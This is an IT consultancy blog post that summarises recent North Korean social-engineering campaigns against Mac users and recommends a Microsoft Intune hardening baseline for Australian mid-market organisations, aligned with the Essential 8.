For years, Australian IT leaders treated macOS as the “quiet corner” of the fleet. A handful of executives and designers on MacBooks, a sprinkle of engineers, and a general assumption that Apple’s built-in protections were enough.
That assumption no longer holds. In April 2026, Microsoft Threat Intelligence publicly dissected a campaign by Sapphire Sleet — a North Korean crew aligned with Lazarus Group — targeting macOS users with a fake Zoom SDK update. A few weeks earlier, Google’s Mandiant team documented UNC1069 dropping seven distinct macOS malware families onto a single victim’s Mac in a coordinated credential and wallet heist.
Two separate DPRK (Democratic People’s Republic of Korea) clusters. Two active macOS intrusion chains. Both relying on social engineering rather than exploits. And both pointing at the same uncomfortable conclusion: Australian organisations running unmanaged or lightly managed Mac fleets are now soft targets for a state-sponsored threat actor.
Our team has been helping mid-market Australian businesses harden their macOS posture through Microsoft Intune, and the recent reporting reinforces why that baseline is no longer optional.
What DPRK Actors Are Actually Doing to Macs in 2026
Ten years ago, the Mac threat landscape was dominated by adware and the occasional supply chain surprise. The DPRK campaigns documented through late 2025 and into 2026 look nothing like that.
Sapphire Sleet’s Zoom SDK lure (April 2026). The attackers pose as recruiters or legitimate contacts on LinkedIn, schedule a “technical interview” on Zoom, and deliver a file named Zoom SDK Update.scpt. macOS opens it in Script Editor by default. Below thousands of blank lines sits a multi-stage chain of curl commands that pull fresh AppleScript payloads, bypass macOS Transparency, Consent and Control (TCC), drop a backdoor named com.apple.cli, and exfiltrate keychains, browser data, Apple Notes, Telegram sessions, and cryptocurrency wallets — all via the Telegram Bot API.
UNC1069’s seven-family ClickFix campaign (February 2026). Mandiant responded to an incident at a fintech where a single victim was contacted over Telegram from a compromised executive account. A deepfake Zoom call was used as the pretext. The user was walked through “troubleshooting” commands that kicked off an AppleScript-driven infection chain dropping WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT, DEEPBREATH, SUGARLOADER, and CHROMEPUSH. Several of these bypass TCC by modifying the TCC database directly.
Contagious Interview and malicious VS Code projects (January 2026). Jamf Threat Labs and Microsoft Defender researchers documented developers being sent fake “coding assessment” repositories via Bitbucket, GitHub, and GitLab. The repositories abuse VS Code task configuration files to execute payloads on macOS. Separately, North Korean operators pushed nearly 200 malicious npm packages in late November 2025, merging features from the well-known BeaverTail and OtterCookie malware families.
The classic lineage is still active. RustBucket, KandyKorn, ObjCShellz, and BeaverTail remain in circulation, now joined by newer loaders like SUGARLOADER and credential stealers dropped through fake systemupdate.app bundles.
The common thread across all of this is that users — not unpatched software — are the initial access vector. And the payloads are increasingly Mach-O binaries, AppleScript chains, and TCC-bypass techniques designed specifically for Apple Silicon fleets.
Why Australian Mid-Market Organisations Are in Scope
The early DPRK macOS campaigns focused heavily on crypto exchanges and Web3 companies. That is no longer the boundary.
In the Mandiant reporting, UNC1069 has pivoted to financial services, payments, brokerage, and wallet infrastructure. Sapphire Sleet’s current lures target anyone with access to financial data or corporate identity. Lazarus was also linked to Medusa ransomware attacks on a healthcare organisation in the U.S. and European defence companies in the past six months.
For Australian organisations in the 50–500 employee band — law firms, accounting practices, super funds, medtech, fintech, professional services — the attack surface is now:
- Executives and partners on MacBooks with access to financial systems
- Developers and engineers using Macs for anything touching code repositories or CI/CD
- Finance and operations staff with access to banking, payments, or payroll
- Anyone active on LinkedIn who might be approached with a “recruiter” pitch
If any of the above runs on a Mac that is not centrally managed, MDM-enrolled, and covered by a hardened baseline, the organisation is essentially betting on user judgement against a well-resourced state-sponsored adversary. The Australian Signals Directorate (ASD) and the Australian Cyber Security Centre (ACSC) have been increasingly direct on this point through 2025 and into 2026: the Essential 8 applies to every managed endpoint, not just the Windows ones.
The Intune for macOS Baseline Our Team Recommends
Intune has matured significantly as a macOS management plane. The features that matter for the current DPRK threat model are not exotic — they are the baseline controls every managed Mac fleet should already have in place.
1. Enforced MDM enrolment via Apple Business Manager. Automated Device Enrolment (ADE) ensures every Mac — company-owned or contractor — hits the fleet already supervised, with the user unable to remove management. Without this, none of the controls below can be reliably enforced.
2. Compliance policies with FileVault, system integrity, and OS version requirements. Intune compliance policies can require FileVault encryption, minimum macOS version, System Integrity Protection (SIP) enabled, and Gatekeeper set to App Store and identified developers only. Non-compliant devices can then be blocked from Microsoft 365 and other Entra-integrated apps through Conditional Access.
3. Platform Single Sign-On with Entra ID. Platform SSO binds the macOS local account to Entra ID, enforces phishing-resistant authentication, and makes credential theft from the keychain far less valuable. Given that DEEPBREATH and CHROMEPUSH both target keychain and browser credentials, Platform SSO is one of the highest-leverage controls available right now.
4. Microsoft Defender for Endpoint on Mac. Defender for Endpoint provides EDR telemetry, behavioural detection, and integration with Microsoft 365 Defender. It catches the kinds of post-compromise behaviours — suspicious osascript execution, curl fetching Mach-O binaries, TCC database tampering — that XProtect alone will miss. Apple has pushed XProtect signatures for the Sapphire Sleet families, but signature-based detection is not a substitute for EDR on a business-critical device.
5. App allow-listing and script execution controls. Intune shell script deployment combined with configuration profiles can restrict where unsigned scripts execute, enforce notarisation requirements, and disable Script Editor for standard users where business use does not require it. This directly disrupts the Zoom SDK Update.scpt style lure.
6. Hardened TCC and privacy preference profiles. Intune configuration profiles can pre-approve only the TCC permissions required by sanctioned apps and prevent users from granting Full Disk Access, Accessibility, or Screen Recording privileges to arbitrary binaries. This is the single most effective control against the TCC-bypass techniques used by DEEPBREATH and the Sapphire Sleet payload chain.
7. Developer workstation separation. Macs used by developers should be treated as a distinct device group with stricter controls on VS Code extensions, source control clients, and package manager behaviour. Given the npm and VS Code project lures documented in the Contagious Interview campaigns, this is no longer a theoretical concern.
Mapped against the Essential 8, this baseline directly strengthens application control, restrict administrative privileges, patch applications, patch operating systems, and multi-factor authentication on macOS — which is historically where Essential 8 implementations have been weakest in Australian mid-market environments.
Practical Starting Point
The organisations our team works with typically fall into one of three postures on macOS:
- No management — Macs purchased through reseller or direct, handed to users, no enrolment. This is where most breaches happen.
- Light management — JAMF or Kandji in place for provisioning, but no Conditional Access, no Defender for Endpoint, no Platform SSO, and no alignment with the Essential 8.
- Full Intune baseline — ABM + ADE, compliance policies, Conditional Access, Defender for Endpoint, Platform SSO, hardened TCC profiles, and monitored through Microsoft 365 Defender.
Moving from posture one or two to a full baseline is not a six-month transformation programme. For a 50–500 person organisation, it is typically a focused engagement of a few weeks to get the core controls in place, followed by ongoing hardening as new Intune capabilities land.
The DPRK threat actors are not going to slow down. Social engineering is, as Microsoft’s global threat intelligence GM recently put it, “low-cost, hard to patch, and scales well.” Australian organisations that get their macOS baseline in order now are the ones that will not be the next case study.
If your organisation runs macOS devices and you are not sure how your current controls map to the Essential 8 or stand up against the current DPRK threat model, we would welcome a conversation. Our team regularly helps Australian mid-market organisations design and deploy Intune for macOS baselines aligned with ACSC guidance and the Essential 8.